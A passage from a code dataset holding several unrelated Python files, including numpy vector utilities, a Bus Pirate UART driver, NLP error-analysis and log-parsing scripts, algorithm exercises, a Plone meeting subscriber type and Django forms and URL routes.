b)) < TOLERANCE\n\n\ndef almost_equal4_vectorized(a, b, TOLERANCE):\n assert a.ndim == 2\n assert b.ndim == 2\n check_vector4_vectorized(a)\n check_vector4_vectorized(a)\n return np.sum(np.abs(a[:, :] - b[:, :])) < TOLERANCE\n\n\ndef check_matrix3(m):\n #print(m.shape)\n assert m.shape == (3, 3)\n\n\ndef make_random_vector(norm, POW, type=\"rand\"):\n if type == \"rand\":\n r = np.random.rand(3)*2 - 1\n elif type == \"randn\":\n r = np.random.randn(3)\n else:\n raise Error(\"nknown random distribution\")\n\n r[:] = np.sign(r[:]) * np.abs(r[:]) ** POW\n r = r / np.sqrt(np.dot(r, r))\n assert (r[0]*r[0] + r[1]*r[1] + r[2]*r[2] - 1) < 0.00000000001\n r = r * norm\n for i in range(0, 3):\n if np.abs(r[i]) < 0.0000001:\n r[i] = 0\n return np.array((r[0], r[1], r[2], 1))\n\n\ndef make_random_vector_vectorized(N, norm, POW, type=\"rand\", normalize=True):\n r = np.ones((N, 4))\n\n #not tested:\n if type == \"rand\":\n r[:, 0:3] = np.random.rand(N, 3)*2 - 1\n elif type == \"randn\":\n r[:, 0:3] = np.random.randn(N, 3)\n else:\n raise Error(\"nknown random distribution\")\n\n r[:, 0:3] = np.sign(r[:, 0:3]) * np.abs(r[:, 0:3]) ** POW\n #r[:,0:3] = r[0:3] / np.tile( np.sqrt( np.sum(r[:,0:3] * r[:,0:3], axis=1, keepdims=True) ) , (1,3) )\n n3 = np.sqrt(np.sum(r[:, 0:3] * r[:, 0:3], axis=1, keepdims=True))\n if normalize:\n r[:, 0:3] = r[:, 0:3] / np.tile(n3, (1, 3))\n s_1 = np.sum(r[:, 0:3] * r[:, 0:3], axis=1) - 1\n assert np.all(np.abs(s_1) < 0.00000000001)\n r[:, 0:3] = r[:, 0:3] * norm\n r[:, 3] = 1\n check_vector4_vectorized(r)\n return r\n\n\ndef normalize_vector(v, snapToZero=False):\n assert not np.any( np.isnan(v.ravel()) )\n assert not np.any( np.isinf(v.ravel()) )\n\n r = v.copy()\n #r[:] = np.sign(r[:]) * np.abs(r[:]) ** POW\n r = r / np.sqrt(np.dot(r, r))\n assert (r[0]*r[0] + r[1]*r[1] + r[2]*r[2] - 1) < 0.00000000001\n if snapToZero:\n for i in range(0, 3):\n if np.abs(r[i]) < 0.0000001:\n r[i] = 0\n r[3] = 1\n return r\n\n#todo: http://floating-point-gui.de/errors/comparison/\n\n#todo: write tests for this\ndef normalize_vector4_vectorized(v, zero_normal=\"leave_zero_norms\"):\n \"\"\" returns vectors of either length 1 or zero. \"\"\"\n N = v.shape[0]\n assert not issubclass(v.dtype.type, np.integer)\n assert not np.any( np.isnan(v) )\n assert not np.any( np.isinf(v) )\n\n # norms = np.linalg.norm(v[:,0:3], axis = 1, keepdims=True, ord=2)\n norms = np.sqrt(np.sum(v[:,0:3] * v[:,0:3], axis=1, keepdims=True))\n denominator = np.tile(norms, (1, 4))\n if zero_normal==\"leave_zero_norms\":\n zeros_i = np.abs(norms.ravel()) < 0.00000001\n non_zero_i = np.logical_not(zeros_i)\n if not np.any(zeros_i):\n c = 1.0 / denominator\n else:\n c = np.ones(denominator.shape)\n c[non_zero_i,:] = 1.0 / denominator[non_zero_i,:]\n else:\n pass\n assert not np.any( np.isnan(c) )\n assert not np.any( np.isinf(c) )\n r = v * c\n assert r.shape[0] == N\n df = np.sum(r[:,0:3] * r[:,0:3], axis=1)\n #print(df.shape)\n #print(df)\n #print(non_zero_i)\n e1a = np.all(np.abs(df[non_zero_i]-1.0) < 0.00000000001)\n e0a = np.all(np.abs(df[zeros_i]) < 0.00000000001)\n\n if not (e1a and e0a):\n print(\"r:\", r)\n print(\"v:\", v)\n print(\"c:\", v)\n print(\"denom: \", denominator)\n print(norms)\n print(denominator)\n print(np.sum(r[:,0:3] * r[:,0:3], axis=1))\n\n #print (e1a)\n #print (e0a)\n assert e1a and e0a # np.all(np.logical_or(e1a, e0a))\n r[:, 3] = 1\n return r\n\n\ndef repeat_vect4(N, v4):\n check_vector4(v4)\n _x = v4\n xa = np.tile(np.expand_dims(_x, axis=0), (N, 1))\n assert xa.shape[0] == N\n return xa\n\n\nimport sys\ndef is_python3():\n #import sys\n v = sys.version_info.major\n return v == 3\n","repo_name":"sohale/implisolid","sub_path":"python_implicit/basic_types.py","file_name":"basic_types.py","file_ext":"py","file_size_in_byte":8298,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"23030435398","text":"from .base import BPError, BusPirate\n\nFOSC = (32000000 / 2)\n\n\nclass UARTCfg:\n OUTPUT_TYPE = 0x10\n DATABITS = 0x0C\n STOPBITS = 0x02\n POLARITY = 0x01\n\n\nclass UARTSpeed:\n _300 = 0b0000\n _1200 = 0b0001\n _2400 = 0b0010\n _4800 = 0b0011\n _9600 = 0b0100\n _19200 = 0b0101\n _33250 = 0b0110\n _38400 = 0b0111\n _57600 = 0b1000\n _115200 = 0b1001\n\n\nclass UART(BusPirate):\n def __init__(self, portname='', speed=115200, timeout=0.1, connect=True):\n \"\"\" Provide the Bus Pirate UART interface\n\n Parameters\n ----------\n portname : str\n Name of comport (/dev/bus_pirate or COM3)\n speed : int\n Communication speed, use default of 115200\n timeout : int\n Timeout in s to wait for reply\n connect : bool\n Automatically connect to BusPirate (default) \n\n Example\n -------\n >>> uart = UART()\n \"\"\"\n self._config = None\n self._echo = False\n super().__init__(portname, speed, timeout, connect)\n\n def enter(self):\n \"\"\" Enter UART mode\n\n Raises\n ------\n BPError\n Could not enter UART mode\n \"\"\"\n if self.mode == 'uart':\n return\n if self.mode != 'bb':\n super(UART, self).enter()\n self.write(0x03)\n self.timeout(self.minDelay * 10)\n if self.response(4) == \"ART1\":\n self.mode = 'uart'\n self.bp_port = 0b00 # two bit port\n self.bp_config = 0b0000\n self.recurse_end()\n return\n self.recurse_flush(self.enter)\n raise BPError('Could not enter UART mode')\n\n @property\n def modestring(self):\n \"\"\" Return mode version string \"\"\"\n self.write(0x01)\n self.timeout(self.minDelay * 10)\n return self.response(4)\n\n @property\n def echo(self):\n return self._echo\n\n @echo.setter\n def echo(self, mode):\n if mode is True:\n self.write(0x03)\n else:\n self.write(0x02)\n if self.response(1, binary=True) != b'\\x01':\n raise ValueError(\"Could not set echo mode\")\n self._echo = mode\n\n def manual_speed_cfg(self, baud):\n \"\"\" Manual baud rate configuration, send 2 bytes\n\n Configures the UART using custom baud rate generator settings. This command is followed by two data bytes that\n represent the BRG register value. Send the high 8 bits first, then the low 8 bits.\n\n Use the UART manual [PDF] or an online calculator to find the correct value (key values: fosc 32mHz,\n clock divider = 2, BRGH=1) . Bus Pirate responds 0x01 to each byte. Settings take effect immediately.\n \"\"\"\n BRG = (FOSC // (4 * baud)) - 1\n BRGH = ((BRG >> 8) & 0xFF)\n BRGL = (BRG & 0xFF)\n self.write(0x03)\n self.write(BRGH)\n self.write(BRGL)\n self.timeout(0.1)\n return self.response()\n\n def begin_input(self):\n self.write(0x04)\n\n def end_input(self):\n self.write(0x05)\n\n def enter_bridge_mode(self):\n \"\"\" UART bridge mode (reset to exit)\n\n Starts a transparent UART bridge using the current configuration. Unplug the Bus Pirate to exit.\n \"\"\"\n self.write(0x0f)\n self.timeout(0.1)\n self.response(1, binary=True)\n\n def set_cfg(self, cfg):\n self.write(0xC0 | cfg)\n self.timeout(0.1)\n return self.response(1, binary=True)\n\n def read_cfg(self):\n self.write(0xd0)\n self.timeout(0.1)\n return self.response(1, binary=True)\n","repo_name":"juhasch/pyBusPirateLite","sub_path":"pyBusPirateLite/UART.py","file_name":"UART.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"21"} +{"seq_id":"14664769513","text":"import ujson as json\nimport os\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tag import pos_tag\nfrom nltk.stem import WordNetLemmatizer\nimport collections\nimport pandas as pd\n\nwnl = WordNetLemmatizer()\n\n\ndef lemmatize_all(sentence):\n wnl = WordNetLemmatizer()\n sen = [w.lower() for w in word_tokenize(sentence)]\n for word, tag in pos_tag(sen):\n if tag.startswith('NN'):\n yield wnl.lemmatize(word, pos='n')\n elif tag.startswith('VB'):\n yield wnl.lemmatize(word, pos='v')\n elif tag.startswith('JJ'):\n yield wnl.lemmatize(word, pos='a')\n elif tag.startswith('R'):\n yield wnl.lemmatize(word, pos='r')\n else:\n yield word\n\n\ndef gen_train(path):\n all_alt = []\n SPACE = ' '\n i = 0\n with open(path, 'r', encoding='ISO-8859-1') as fh:\n for line in fh:\n i += 1\n line = line.strip().split('\\t')\n del line[0]\n alt = SPACE.join(lemmatize_all(line[1]))\n all_alt.append(alt)\n alt = SPACE.join(lemmatize_all(line[4]))\n all_alt.append(alt)\n fh.close()\n\n return all_alt\n\n\ndef gen_test(path, error_meta=None):\n fp_alt = []\n fn_alt = []\n all_alt = []\n SPACE = ' '\n i = 0\n with open(path, 'r', encoding='utf8') as fh:\n for line in fh:\n i += 1\n line = line.strip().split('\\t')\n del line[-1]\n alt = SPACE.join(lemmatize_all(line[1]))\n all_alt.append(alt)\n if error_meta:\n if i in error_meta['FP']:\n fp_alt.append(alt)\n elif i in error_meta['FN']:\n fn_alt.append(alt)\n fh.close()\n ids = [j for j in range(1, i + 1)]\n for fp in error_meta['FP']:\n ids.remove(fp)\n for fn in error_meta['FN']:\n ids.remove(fn)\n\n return fp_alt, fn_alt, all_alt, ids\n\n\n# english_punctuations = [',', '.', ':', ';', '?', '(', ')', '[', ']', '&', '!', '*', '@', '#', '$', '%', '\"', '``',\n# '-', '\\'\\''] seg_test_filtered = [[[word.lower() for word in seg if word not in english_punctuations] for seg in\n# sen] for sen in sens]\n\n\nif __name__ == \"__main__\":\n training_path = '../data/raw_data/altlex_train.tsv'\n boot_path = '../data/raw_data/altlex_train_bootstrapped.tsv'\n valid_path = '../data/raw_data/altlex_dev.tsv'\n test_path = '../data/raw_data/altlex_gold.tsv'\n\n training_all_alt = gen_train(training_path)\n tr_total = len(training_all_alt)\n boot_all_alt = gen_train(boot_path)\n bt_total = len(boot_all_alt)\n training_set = set(training_all_alt)\n boot_set = set(boot_all_alt)\n\n error_path = '../outputs/bootstrapped/MCDN/results/FALSE_valid.json'\n with open(error_path, 'r') as fh:\n error_meta = json.load(fh)\n test_fp_alt, test_fn_alt, test_all_alt, ids = gen_test(test_path, error_meta)\n te_total = len(test_all_alt)\n fn_total = len(test_fn_alt)\n fp_total = len(test_fp_alt)\n test_set = set(test_all_alt)\n not_in_training = test_set.difference(test_set.intersection(training_set))\n not_in_boot = test_set.difference(test_set.intersection(boot_set))\n print(\"Not in training: \", not_in_training)\n print(\"Not in bootstrapped: \", not_in_boot)\n\n tc = collections.Counter(training_all_alt)\n bc = collections.Counter(boot_all_alt)\n fpc = collections.Counter(test_fp_alt)\n fnc = collections.Counter(test_fn_alt)\n tec = collections.Counter(test_all_alt)\n print('Top 5 in Train: ', tc.most_common(5))\n tck, tcv = [], []\n tc_acu = 0\n for k, v in tc.most_common(10):\n tck.append(k)\n tcv.append(v)\n tc_acu += v\n print(tc_acu / tr_total)\n\n print('Top 5 in Test: ', tec.most_common(5))\n tek, tev = [], []\n te_acu = 0\n for k, v in tec.most_common(10):\n tek.append(k)\n tev.append(v)\n te_acu += v\n print(te_acu / te_total)\n\n print('Top 5 in FP: ', fpc.most_common(5))\n fpk, fpv = [], []\n fp_acu = 0\n for k, v in fpc.most_common(10):\n fpk.append(k)\n fpv.append(v)\n fp_acu += v\n print(fp_acu / fp_total)\n\n print('Top 5 in FN: ', fnc.most_common(5))\n fnk, fnv = [], []\n fn_acu = 0\n for k, v in fnc.most_common(10):\n fnk.append(k)\n fnv.append(v)\n fn_acu += v\n print(fn_acu / fn_total)\n\n print(ids)\n df = pd.DataFrame({'train_word': tck, 'train_freq': tcv, 'test_word': tek, 'test_freq': tev,\n 'fp_word': fpk, 'fp_freq': fpv, 'fn_word': fnk, 'fn_freq': fnv})\n df.to_csv('../analysis.csv', index=False)\n","repo_name":"shiningliang/Multi-level-Causality-Detection-Network","sub_path":"utils/result_analyze.py","file_name":"result_analyze.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"8516473237","text":"# Lazy algorithm for solving dynamic connectivity problem\n# Modified quick union - link root of smaller tree t o root of larger tree\n# Data structure\n# Integer array id[] of size N\n# Interpretation - array representing set of trees, each entry in array contains reference to parent\n# id[i] is parent of i\n# root of i is id[id[i]] - keep going until the value doesn't change\n\nfrom QuickUnion import QuickUnion\n\n\nclass WeightedQuickUnion(QuickUnion):\n\n # n being the number of nodes\n # sz being the size of the tree\n def __init__(self, n):\n super().__init__(n)\n self.sz = []\n for x in range(n):\n # Set the size of each tree initially to 1\n self.sz.append(1)\n\n # Given two nodes, connect them\n # Two nodes are connected by setting id of the smallest root to the id of the largest root\n def union(self, first_id, second_id):\n first_root = self.root(first_id)\n second_root = self.root(second_id)\n # If first_id has a greater sized tree, set second_id root to first_id root, and update the size of first_id\n if self.sz[first_id] >= self.sz[second_root]:\n self.id[second_id] = first_root\n self.sz[first_id] += self.sz[second_id]\n else:\n self.id[first_id] = second_root\n self.sz[second_id] += self.sz[first_id]\n\n\n","repo_name":"UnnervingOstrich/Algorithms","sub_path":"DynamicConnectivity/WeightedQuickUnion.py","file_name":"WeightedQuickUnion.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34878707177","text":"from django import forms\n\nSEVERITY_CHOICES_ENG = [\n\t('INFORMATIONAL', 'INFORMATIONAL'),\n\t('LOW', 'LOW'),\n ('MEDIUM', 'MEDIUM'),\n ('HIGH', 'HIGH'),\n ('CRITICAL', 'CRITICAL')\n]\n\nSEVERITY_CHOICES_SPA = [\n\t('INFORMATIONAL', 'INFORMATIONAL'),\n\t('BAJO', 'BAJO'),\n ('MEDIO', 'MEDIO'),\n ('ALTO', 'ALTO'),\n ('CRITICO', 'CRITICO')\n]\n\nclass ObservationForm(forms.Form):\n description = forms.CharField(label='Description', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n description_note = forms.CharField(label='Description Note', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n implication = forms.CharField(label='Implication', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n recommendation = forms.CharField(label='Recommendation', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n recommendation_note = forms.CharField(label='Recommendation Notes', required=True, widget=forms.Textarea(attrs={'rows':4, 'cols':40}))\n #\n severity = forms.CharField(label='Severity', widget=forms.Select(choices=SEVERITY_CHOICES_SPA), required=True)\n\n def populate(self, mongo_obj):\n self.fields['description'].initial = mongo_obj['OBSERVATION']['TITLE']\n self.fields['description_note'].initial = mongo_obj['OBSERVATION']['NOTE']\n self.fields['implication'].initial = mongo_obj['IMPLICATION']\n self.fields['recommendation'].initial = mongo_obj['RECOMMENDATION']['TITLE']\n self.fields['recommendation_note'].initial = mongo_obj['RECOMMENDATION']['URLS']\n #\n choices = SEVERITY_CHOICES_ENG if mongo_obj['LANGUAGE'] == 'eng' else SEVERITY_CHOICES_SPA\n self.fields['severity'].widget.choices = choices\n\nclass ApproverForm(forms.Form):\n file = forms.FileField()","repo_name":"badBounty/VM-Orchestrator","sub_path":"VM_Orchestrator/VM_OrchestratorApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17639153536","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ncreated by huash06 at 2015-04-27 20:47\n\nSort a linked list in O(n log n) time using constant space complexity.\n\n\"\"\"\n\n__author__ = 'huash06'\n\nimport sys\nimport os\nimport itertools\nimport collections\nimport functools\nimport bisect\nimport datetime\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\n def output(self):\n print(self.val, end='->')\n if self.next:\n self.next.output()\n\nclass Solution:\n # @param {ListNode} head\n # @return {ListNode}\n def sortList(self, head):\n if not head:\n return None\n l = 0\n h = head\n while h:\n l += 1\n h = h.next\n return self.mergeSort(head, l)\n\n\n def mergeSort(self, head, lenlist):\n if lenlist == 1:\n return head\n elif lenlist == 2:\n if head.val > head.next.val:\n tmp = head.val\n head.val = head.next.val\n head.next.val = tmp\n return head\n\n h = head\n l = 1\n while l < lenlist // 2:\n h = h.next\n l += 1\n nh = h.next\n h.next = None\n h1 = self.mergeSort(head, l)\n h2 = self.mergeSort(nh, lenlist-l)\n return self.mergeList(h1, h2)\n\n\n def mergeList(self, head1, head2):\n if not head2:\n return head1\n elif not head1:\n return head2\n\n ret = ListNode(-1000000)\n h1 = head1\n h2 = head2\n h = ret\n while h1 and h2:\n if h1.val < h2.val:\n h.next = h1\n h1 = h1.next\n else:\n h.next = h2\n h2 = h2.next\n h = h.next\n if h1:\n h.next = h1\n if h2:\n h.next = h2\n\n return ret.next\n\n\n\ns = Solution()\ns.sortList(ListNode(0)).output()\nprint()\n\nl = ListNode(1)\nl.next = ListNode(4)\nnode = l.next\nvals = [3, 2, 5, 2]\nfor val in vals:\n node.next = ListNode(val)\n node = node.next\nl.output()\nprint()\ns.sortList(l).output()\nprint()\n","repo_name":"shhuan/algorithms","sub_path":"leetcode/medium/Sort_List.py","file_name":"Sort_List.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12136556870","text":"#!/usr/bin/env python3\n\nimport sys, os\nimport msprime\nimport pyslim\nimport numpy as np\n\nhelpMsg = '''\n usage: $./recapitation.py \n\n - recapitates and samples from the tree-sequence output from SLiM simulations\n'''\n\ndef main(args):\n if len(args) != 5: #4 arguments\n return helpMsg\n\n slim_tree_path = args[1]\n slim_params_path = args[2]\n N = int(args[3])\n out_path = args[4]+\".trees\"\n\n with open(slim_params_path, \"r\") as paramF:\n lines = paramF.readlines()\n\n mu = float(lines[0].strip())\n rho = float(lines[1].strip())\n Ne_recap = int(lines[2].strip().split()[1])\n\n ts = pyslim.load(slim_tree_path)\n ts_recap = ts.recapitate(recombination_rate=rho, Ne=Ne_recap)\n sampN = np.random.choice(ts_recap.samples(), size=N, replace=False)\n ts_samp = ts_recap.simplify(samples=sampN)\n\n ts_samp.dump(out_path)\n\n return 0\n\nsys.exit(main(sys.argv))","repo_name":"CshlSiepelLab/arg-selection","sub_path":"sims/recapitation.py","file_name":"recapitation.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"75187680693","text":"import os, json\nimport argparse\nimport matplotlib.pyplot as plt\n\ndef parse_args():\n parser=argparse.ArgumentParser()\n parser.add_argument(\"--output_dir\", type=str, required=False, default=\"/opt/data/curious_poet/curious_poet_paper_dataset/centralized_ICM\")\n parser.add_argument(\"--run_name\", type=str, required=False, default = \"icm_gamma10.0_wCM_8marA\") #'all' to run on all runs_folders\n parser.add_argument(\"--latest_log_filename\", type=str, default=None) \n parser.add_argument(\"--output_data_filename\", type=str, required=False, default='annecsVsIterations.json')\n parser.add_argument(\"--output_figure_filename\", type=str, required=False, default='annecsVsIterations.png')\n args=parser.parse_args()\n return args\n\ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\ndef get_longest_log_filename(args, run_name) -> str:\n listdir = os.listdir(os.path.join(args.output_dir, run_name))\n logs = [a for a in listdir if 'run.log' in a]\n logs.sort(key=len)\n return logs[-1]\n\ndef recursively_extract_log_filenames(args, run_name) -> [str]:\n # in retrospect, this could have been done by simply sorting all the log filenames by length...\n listdir = os.listdir(os.path.join(args.output_dir, run_name))\n\n ret = ['run.log']\n if not args.latest_log_filename is None:\n log = args.latest_log_filename\n else:\n log = get_longest_log_filename(args, run_name)\n\n if log == ret[0]:\n return ret\n starts = find(log, '[')\n starts.reverse()\n ends = find(log, ']')\n assert len(starts) == len(ends)\n\n for i in range(len(starts)):\n inside_brackets = log[starts[i]+1:ends[i]]\n fn = inside_brackets+\".resume_run.log\"\n ret.append(fn)\n assert fn in listdir\n # print(ret)\n ret.append(log)\n return ret\n\ndef main():\n \"\"\"\n Given the last run log from a series of resumes, open all the logs (starting with run.log) in sequence\n and parse out the ANNECS vs iteration values. \n\n \"\"\"\n args = parse_args()\n if args.run_name == 'all':\n run_names = []\n for run_name in os.listdir(args.output_dir):\n if os.path.isdir(os.path.join(args.output_dir, run_name)) and 'gamma' in run_name:\n run_names.append(run_name)\n else:\n run_names = [args.run_name]\n run_names.sort()\n\n for run_name in run_names:\n print(f\"processing run name: {run_name}\")\n logs = recursively_extract_log_filenames(args, run_name)\n print(f\"log files\")\n print(logs)\n \n iteration = []\n annecs = []\n latest_annecs_value = 0\n # this will need to handle overlapping iterations between log files\n for fn in logs:\n print(fn)\n filename = os.path.join(args.output_dir, run_name, fn)\n with open(filename, 'r') as f:\n lines = f.readlines()\n for idx, line in enumerate(lines):\n if 'added to ANNECS:' in line and 'True' in line:\n latest_annecs_value += 1\n print(f\"latest_annecs_value: {latest_annecs_value}\")\n if 'Iter=' in line:\n start = line.find('Iter=')+5\n end = line.find(' ', start)\n latest_iter = int(line[start:end])\n\n \n if latest_iter == 0 or latest_iter != iteration[-1]: #new iter number(sometimes there are repeats)\n iteration.append(latest_iter)\n \n\n annecs.append(latest_annecs_value)\n assert len(iteration) == len(annecs)\n with open(os.path.join(args.output_dir, run_name, args.output_data_filename), 'w+') as f:\n json.dump({'iteration': iteration, 'annecs':annecs}, f) \n\n # plot individually\n fig, axs = plt.subplots(1,1)\n axs.plot(iteration, annecs)\n axs.set_title(f\"ANNECS vs Training Iterations \\n Run name: {run_name}\")\n axs.grid(True)\n \n plt.savefig(os.path.join(args.output_dir, run_name, args.output_figure_filename))\n print('plot created')\n\n\n print('done')\n\n \nif __name__ == \"__main__\":\n main()","repo_name":"act3-ace/Curious-POET","sub_path":"cpoet/utils/parse_log_plot_annecs.py","file_name":"parse_log_plot_annecs.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1867358136","text":"# 통계학\nimport sys\nN = int(sys.stdin.readline()) # 홀수\n\nnums_dict = {}\nnums = []\nfor _ in range(N):\n num = int(sys.stdin.readline().rstrip())\n nums.append(num)\n if num in nums_dict:\n nums_dict[num] += 1\n else:\n nums_dict[num] = 1\n \n# 산술평균\nnums.sort()\nprint(round(sum(nums) / N))\n\n# 중앙값\nprint(nums[N//2])\n\n# 최빈값\nmodes = []\nmax_cnt = max(nums_dict.values())\n\nfor num, cnt in nums_dict.items():\n if cnt == max_cnt:\n modes.append(num)\n\nmodes.sort()\nprint(modes[1]) if len(modes) > 1 else print(modes[0])\n\n# 범위\nprint(max(nums) - min(nums))","repo_name":"watchstep/TIS-python","sub_path":"BAEKJOON/silver3/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35086205618","text":"import re, pyperclip, datetime, os\n\n# ffmpeg code to create ffout.txt asf:\n# ffmpeg -i ytVidNew.mkv -filter:v \"select='gt(scene,0.2)',showinfo\" -f null - 2> ffout.txt\n\nwith open(\"ffout.txt\") as f:\n data = f.read()\n\nsRes = re.findall(\"pts_time:(.+)pos:\", data)\n\n# making a dic of ep nos & names from the gathered jpgs\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\nfilenames = next(os.walk(os.path.dirname(os.path.abspath(__file__))), (None, None, []))[2] # [] if no file\nepNoAndNamesDic = {}\nfor fname in filenames:\n if fname[-3:] == 'jpg': \n fnameSplitted = fname[:-4].split()\n epNoAndNamesDic[int(fnameSplitted[1])] = ' '.join(fnameSplitted[2:])\n\nchaptersInDesc = \"0:00:00 - Ep 47 Project Raven\\n\"\n\nfor idx,res in enumerate(sRes):\n timeStamp = int(float(res.strip()))\n tsInHHMMSS = str(datetime.timedelta(seconds=timeStamp))\n wholeLine = f\"{tsInHHMMSS} - Ep {idx+48} {epNoAndNamesDic[idx+48]} \\n\"\n chaptersInDesc += wholeLine\n\npyperclip.copy(chaptersInDesc)","repo_name":"firozzer/DarknetDiariesJokes","sub_path":"archived/chapterMaker.py","file_name":"chapterMaker.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"922584234","text":"\"\"\" Subscriber \"\"\"\n# -*- coding: utf-8 -*-\nimport datetime\nimport uuid\nfrom eea.meeting.constants import ACTION_APPROVE, ACTION_REJECT\nfrom eea.meeting.interfaces import ISubscriber\nfrom plone import api\nfrom plone.api.exc import MissingParameterError\nfrom plone.dexterity.content import Item\nfrom zope.interface import implementer\n\n\n@implementer(ISubscriber)\nclass Subscriber(Item):\n \"\"\" EEA Meeting Subscriber content type\"\"\"\n\n def state(self):\n \"\"\" Subscriber's state \"\"\"\n return api.content.get_state(self)\n\n def get_details(self):\n \"\"\" Details for subscriber \"\"\"\n try:\n member = api.user.get(userid=self.userid)\n except MissingParameterError:\n member = None\n\n if not member:\n return {'edit_url': \"{0}/edit\".format(self.absolute_url())}\n\n return {\n 'first_name': member.getProperty('first_name', ''),\n 'last_name': member.getProperty('last_name', ''),\n 'fullname': member.getProperty('fullname', ''),\n 'telephone': member.getProperty('telephone', ''),\n 'phone_numbers': ', '.join(\n member.getProperty('phone_numbers', [])),\n 'institution': member.getProperty('institution', ''),\n 'from_country': member.getProperty('from_country', ''),\n 'from_city': member.getProperty('from_city', ''),\n 'position': member.getProperty('position', ''),\n 'address': member.getProperty('address', ''),\n 'edit_url': \"{0}/edit\".format(self.absolute_url())\n }\n\n def is_allowed_state_change(self):\n \"\"\" Used as transition guard expression to prevent state change\n for subscribers of ended meetings\n\n /portal_workflow/meeting_subscriber_workflow/transitions/approve\n /manage_properties\n Guard expression:\n python:here.is_allowed_state_change() is True\n \"\"\"\n meeting_end_date = self.aq_parent.aq_parent.end.replace(tzinfo=None)\n today = datetime.datetime.today()\n is_meeting_ended = (meeting_end_date - today).days < -1\n is_allowed_state_change = is_meeting_ended is not True\n return is_allowed_state_change\n\n\ndef state_change(obj, evt):\n \"\"\" state change \"\"\"\n\n subscribers = obj.aq_parent\n meeting = subscribers.get_meeting()\n subscribers_state = api.content.get_state(subscribers)\n if hasattr(evt, 'action'):\n if (evt.action == ACTION_APPROVE and subscribers_state != 'full' and\n subscribers.approved_count() >= meeting.max_participants):\n api.content.transition(obj=subscribers, transition='to_full')\n elif (evt.action == ACTION_REJECT and subscribers_state == 'full' and\n subscribers.approved_count() < meeting.max_participants):\n api.content.transition(obj=subscribers, transition='to_open')\n\n\ndef on_add(obj, evt):\n \"\"\" on add \"\"\"\n\n obj.uid = uuid.uuid4()\n meeting = obj.aq_parent.aq_parent\n if meeting.auto_approve:\n api.content.transition(obj=obj, transition='approve')\n\n\ndef on_delete(obj, evt):\n \"\"\" on delete \"\"\"\n subscribers = obj.aq_parent\n meeting = subscribers.get_meeting()\n subscribers_state = api.content.get_state(subscribers)\n if (subscribers_state == 'full' and meeting.allow_register and\n subscribers.approved_count() < meeting.max_participants):\n api.content.transition(obj=subscribers, transition='to_open')\n","repo_name":"eea/eea.meeting","sub_path":"src/eea/meeting/content/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19251695465","text":"import logging\nfrom behave.api.async_step import use_or_create_async_context, AsyncContext\n\ndef before_all(context):\n if not context.config.log_capture:\n logging.basicConfig(level=logging.DEBUG)\n\ndef before_scenario(context, scenario):\n context.async_loop = use_or_create_async_context(context, \"async_context1\").loop\n context.port_seq = 5000\n context.node = {}\n context.block_new = {}\n","repo_name":"mrkovec/coinpy","sub_path":"features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40168670188","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\nurlpatterns = [\n path('',views.shop,name=\"shop\"),\n path('about/',views.about,name=\"about\"),\n path('details/',views.details,name=\"details\"),\n path('login/details',views.details,name=\"details\"),\n path('entry/',views.entry,name=\"entry\"),\n path('entry/about/',views.about,name=\"about\"),\n path('shop/details/',views.details,name=\"details\"),\n path('shop/buy/',views.buy,name=\"buy\"),\n path('server/',views.server,name=\"server\"),\n path('server/control/',views.control,name=\"control\"),\n path('server/control/delete',views.delete,name=\"delete\"),\n path('shop/buy/order/',views.order,name=\"order\"),\n path('server/control/save_in_db',views.save,name=\"save_in_db\"),\n path('login/',views.login,name=\"login\"),\n path('login/val',views.val,name=\"val\"),\n path('shop/search',views.search,name=\"search\"),\n path('shop/logout',views.logout,name=\"logout\"),\n path('server/control/admin/',admin.site.urls),\n path('shop/catagory_1/',views.catogories_1,name=\"catogories_1\"),\n path('shop/catagory_2/',views.catogories_2,name=\"catogories_2\"),\n path('shop/catagory_3/',views.catogories_3,name=\"catogories_3\"),\n path('shop/catagory_4/',views.catogories_4,name=\"catogories_4\"),\n path('shop/catagory_5/',views.catogories_5,name=\"catogories_5\"),\n path('shop/catagory_6/',views.catogories_6,name=\"catogories_6\"), 